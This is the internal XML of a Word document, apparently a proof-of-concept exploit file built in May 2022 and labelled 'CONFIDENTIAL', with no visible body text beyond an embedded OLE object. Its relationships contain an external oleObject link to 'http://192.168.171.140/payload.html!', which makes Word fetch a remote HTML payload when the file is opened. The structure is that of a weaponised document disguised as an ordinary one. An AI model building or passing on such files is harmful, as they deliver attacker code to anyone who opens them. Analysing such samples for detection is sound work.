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CBAD30" w14:textId="79CCEBAA" w:rsidR="00582E9F" w:rsidRDefault="0079106E">
      <w:r>
        <w:object w:dxaOrig="2832" w:dyaOrig="2832" w14:anchorId="4579C88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1.6pt;height:141.6pt" o:ole="">
            <v:imagedata r:id="rId6" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Link" ProgID="PBrush" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1715504462" r:id="rId7" UpdateMode="OnCall"/>
          <o:LinkType>EnhancedMetaFile</o:LinkType>
          <o:LockedField>false</o:LockedField>
          <o:FieldCodes>\f 0</o:FieldCodes>
        </w:object>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00582E9F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0832FD" w14:textId="77777777" w:rsidR="0079106E" w:rsidRDefault="0079106E" w:rsidP="0079106E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7B7DD3FF" w14:textId="77777777" w:rsidR="0079106E" w:rsidRDefault="0079106E" w:rsidP="007910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3EFA4D" w14:textId="015564DC" w:rsidR="0079106E" w:rsidRDefault="0079106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440B03E5" wp14:editId="076EB094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050"/>
              <wp:effectExtent l="0" t="0" r="0" b="12700"/>
              <wp:wrapNone/>
              <wp:docPr id="1" name="MSIPCMce9943718352bbf77a21de7a" descr="{&quot;HashCode&quot;:1112019481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3F9E5E20" w14:textId="1203DE56" w:rsidR="0079106E" w:rsidRPr="0079106E" w:rsidRDefault="0079106E" w:rsidP="0079106E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4"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="0079106E">
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:color w:val="000000"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:t>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40B03E5" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="MSIPCMce9943718352bbf77a21de7a" o:spid="_x0000_s1026" type="#_x0000_t202" alt="{&quot;HashCode&quot;:1112019481,&quot;Height&quot;:841.0,&quot;Width&quot;:595.0,&quot;Placement&quot;:&quot;Footer&quot;,&quot;Index&quot;:&quot;Primary&quot;,&quot;Section&quot;:1,&quot;Top&quot;:0.0,&quot;Left&quot;:0.0}" style="position:absolute;margin-left:0;margin-top:805.3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" o:allowincell="f" filled="f" stroked="f" strokeweight=".5pt">
              <v:fill o:detectmouseclick="t"/>
              <v:textbox inset=",0,,0">
                <w:txbxContent>
                  <w:p w14:paraId="3F9E5E20" w14:textId="1203DE56" w:rsidR="0079106E" w:rsidRPr="0079106E" w:rsidRDefault="0079106E" w:rsidP="0079106E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000000"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="0079106E">
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t>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C4102C" w14:textId="77777777" w:rsidR="0079106E" w:rsidRDefault="0079106E" w:rsidP="0079106E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1AE77799" w14:textId="77777777" w:rsidR="0079106E" w:rsidRDefault="0079106E" w:rsidP="0079106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06E"/>
    <w:rsid w:val="00582E9F"/>
    <w:rsid w:val="0079106E"/>
    <w:rsid w:val="00AD1AA4"/>
    <w:rsid w:val="00B91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43B960"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{06E43170-8650-45D7-A05F-8B280A5B8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910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106E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007910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10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oleObject" Target="http://192.168.171.140/payload.html!" TargetMode = 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Li</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Andy Li</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-31T04:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-31T04:15:00Z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fc9ec38-a838-4e83-8605-6fdb881e5850_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_dfc9ec38-a838-4e83-8605-6fdb881e5850_SetDate">
    <vt:lpwstr>2022-05-31T04:15:07Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_dfc9ec38-a838-4e83-8605-6fdb881e5850_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_dfc9ec38-a838-4e83-8605-6fdb881e5850_Name">
    <vt:lpwstr>CONFIDENTIAL</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_dfc9ec38-a838-4e83-8605-6fdb881e5850_SiteId">
    <vt:lpwstr>d7a0631f-6d03-435f-a80e-764129e5d298</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_dfc9ec38-a838-4e83-8605-6fdb881e5850_ActionId">
    <vt:lpwstr>539cee55-5a1b-4d98-92d3-a140436b7635</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_dfc9ec38-a838-4e83-8605-6fdb881e5850_ContentBits">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
</Properties>
</file>